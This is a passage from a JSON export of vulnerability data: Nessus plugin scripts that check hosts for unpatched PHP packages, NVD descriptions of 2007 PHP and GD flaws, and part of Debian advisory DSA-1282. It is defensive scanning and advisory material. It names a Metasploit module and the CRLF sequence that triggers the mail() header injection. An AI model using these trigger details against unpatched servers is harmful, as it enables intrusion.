patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K7859\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL7859.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL7859\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"9.6.0-9.6.1\",\"10\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"9.4.1-9.4.8\",\"10\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP intrerpreter to creash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nA buffer overflow in the sqlite_decode_function() in the bundled\nsqlite library could allow context-dependent attackers to execute\narbitrary code (CVE-2007-1887).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of the Hardened PHP patch helped to protect\nagainst some of these issues prior to patching.", "modified": "2018-12-05T00:00:00", "published": "2007-04-30T00:00:00", "id": "MANDRAKE_MDKSA-2007-089.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25113", "title": "Mandrake Linux Security Advisory : php (MDKSA-2007:089)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:089. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25113);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/12/05 20:31:23\");\n\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1717\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_bugtraq_id(22764, 23016, 23145, 23357);\n script_xref(name:\"MDKSA\", value:\"2007:089\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2007:089)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP intrerpreter to creash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nA buffer overflow in the sqlite_decode_function() in the bundled\nsqlite library could allow context-dependent attackers to execute\narbitrary code (CVE-2007-1887).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of the Hardened PHP patch helped to protect\nagainst some of these issues prior to patching.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libphp5_common5-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cgi-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cli-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-devel-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-fcgi-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-gd-5.1.6-1.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-mbstring-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-sqlite-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2007-1286\n Stefan Esser discovered an overflow in the object\n reference handling code of the unserialize() function,\n which allows the execution of arbitrary code if\n malformed input is passed from an application.\n\n - CVE-2007-1380\n Stefan Esser discovered that the session handler\n performs insufficient validation of variable name length\n values, which allows information disclosure through a\n heap information leak.\n\n - CVE-2007-1521\n Stefan Esser discovered a double free vulnerability in\n the session_regenerate_id() function, which allows the\n execution of arbitrary code.\n\n - CVE-2007-1711\n Stefan Esser discovered a double free vulnerability in\n the session management code, which allows the execution\n of arbitrary code.\n\n - CVE-2007-1718\n Stefan Esser discovered that the mail() function\n performs insufficient validation of folded mail headers,\n which allows mail header injection.\n\n - CVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP\n archives performs insufficient length checks, which\n allows the execution of arbitrary code.", "modified": "2018-11-10T00:00:00", "published": "2007-04-30T00:00:00", "id": "DEBIAN_DSA-1282.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25099", "title": "Debian DSA-1282-1 : php4 - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1282. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25099);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-1286\", \"CVE-2007-1380\", \"CVE-2007-1521\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1777\");\n script_xref(name:\"DSA\", value:\"1282\");\n\n script_name(english:\"Debian DSA-1282-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2007-1286\n Stefan Esser discovered an overflow in the object\n reference handling code of the unserialize() function,\n which allows the execution of arbitrary code if\n malformed input is passed from an application.\n\n - CVE-2007-1380\n Stefan Esser discovered that the session handler\n performs insufficient validation of variable name length\n values, which allows information disclosure through a\n heap information leak.\n\n - CVE-2007-1521\n Stefan Esser discovered a double free vulnerability in\n the session_regenerate_id() function, which allows the\n execution of arbitrary code.\n\n - CVE-2007-1711\n Stefan Esser discovered a double free vulnerability in\n the session management code, which allows the execution\n of arbitrary code.\n\n - CVE-2007-1718\n Stefan Esser discovered that the mail() function\n performs insufficient validation of folded mail headers,\n which allows mail header injection.\n\n - CVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP\n archives performs insufficient length checks, which\n allows the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1282\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the PHP packages. Packages for the arm, m68k, mips and mipsel\narchitectures are not yet available. They will be provided later.\n\nFor the oldstable distribution (sarge) these problems have been fixed\nin version 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.4.4-8+etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache2-mod-php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cgi\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cli\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-common\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-curl\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-dev\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-domxml\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-gd\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-imap\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-ldap\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mcal\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mhash\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mysql\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-odbc\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-pear\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-recode\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-snmp\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-sybase\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-xslt\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libapache-mod-php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libapache2-mod-php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-cgi\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-cli\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-common\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-curl\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-dev\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-domxml\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-gd\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-imap\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-interbase\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-ldap\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mcal\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mcrypt\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mhash\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mysql\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-odbc\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pear\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pgsql\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pspell\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-recode\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-snmp\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-sybase\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-xslt\", reference:\"4.4.4-8+etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "cve": [{"lastseen": "2018-11-01T05:11:28", "bulletinFamily": "NVD", "description": "Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.", "modified": "2018-10-30T12:25:35", "published": "2007-04-05T20:19:00", "id": "CVE-2007-1001", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1001", "title": "CVE-2007-1001", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "Double free vulnerability in the unserializer in PHP 4.4.5 and 4.4.6 allows context-dependent attackers to execute arbitrary code by overwriting variables pointing to (1) the GLOBALS array or (2) the session data in _SESSION. NOTE: this issue was introduced when attempting to patch CVE-2007-1701 (MOPB-31-2007).", "modified": "2018-10-16T12:40:34", "published": "2007-03-26T21:19:00", "id": "CVE-2007-1711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1711", "title": "CVE-2007-1711", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "CRLF injection vulnerability in the mail function in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allows remote attackers to inject arbitrary e-mail headers and possibly conduct spam attacks via a control character immediately following folding of the (1) Subject or (2) To parameter, as demonstrated by a parameter containing a \"\\r\\n\\t\\n\" sequence, related to an increment bug in the SKIP_LONG_HEADER_SEP macro.", "modified": "2018-10-30T12:25:35", "published": "2007-03-27T20:19:00", "id": "CVE-2007-1718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1718", "title": "CVE-2007-1718", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-18T15:06:07", "bulletinFamily": "NVD", "description": "Buffer overflow in the gdImageStringFTEx function in gdft.c in GD Graphics Library 2.0.33 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted string with a JIS encoded font.", "modified": "2018-10-16T12:32:52", "published": "2007-01-30T12:28:00", "id": "CVE-2007-0455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0455", "title": "CVE-2007-0455", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "Integer overflow in PHP 4.4.4 and earlier allows remote context-dependent attackers to execute arbitrary code via a long string to the unserialize function, which triggers the overflow in the ZVAL reference counter.", "modified": "2018-10-16T12:37:48", "published": "2007-03-06T15:19:00", "id": "CVE-2007-1286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1286", "title": "CVE-2007-1286", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "The Zend Engine in PHP 4.x before 4.4.7, and 5.x before 5.2.2, allows remote attackers to cause a denial of service (stack exhaustion and PHP crash) via deeply nested arrays, which trigger deep recursion in the variable destruction routines.", "modified": "2018-10-30T12:25:35", "published": "2007-03-06T15:19:00", "id": "CVE-2007-1285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1285", "title": "CVE-2007-1285", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "The mb_parse_str function in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 sets the internal register_globals flag and does not disable it in certain cases when a script terminates, which allows remote attackers to invoke available PHP scripts with register_globals functionality that is not detectable by these scripts, as demonstrated by forcing a memory_limit violation.", "modified": "2018-10-30T12:25:35", "published": "2007-03-21T19:19:00", "id": "CVE-2007-1583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1583", "title": "CVE-2007-1583", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:26", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1282-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 26th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-1286 CVE-2007-1380 CVE-2007-1521 CVE-2007-1711 CVE-2007-1718 CVE-2007-1777\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\n Stefan Esser discovered an overflow in the object reference handling\n code of the unserialize() function, which allows the execution of\n arbitrary code if malformed input is passed from an application.\n\nCVE-2007-1380\n Stefan Esser discovered that the session handler performs\n insufficient validation of variable name length values, which allows\n information disclosure through a heap information leak.\n\nCVE-2007-1521\n Stefan Esser discovered a double free vulnerability in the\n session_regenerate_id() function, which allows the execution of\n arbitrary code. \n\nCVE-2007-1711\n Stefan Esser discovered a double free vulnerability in the session\n management code, which allows the execution of arbitrary code. 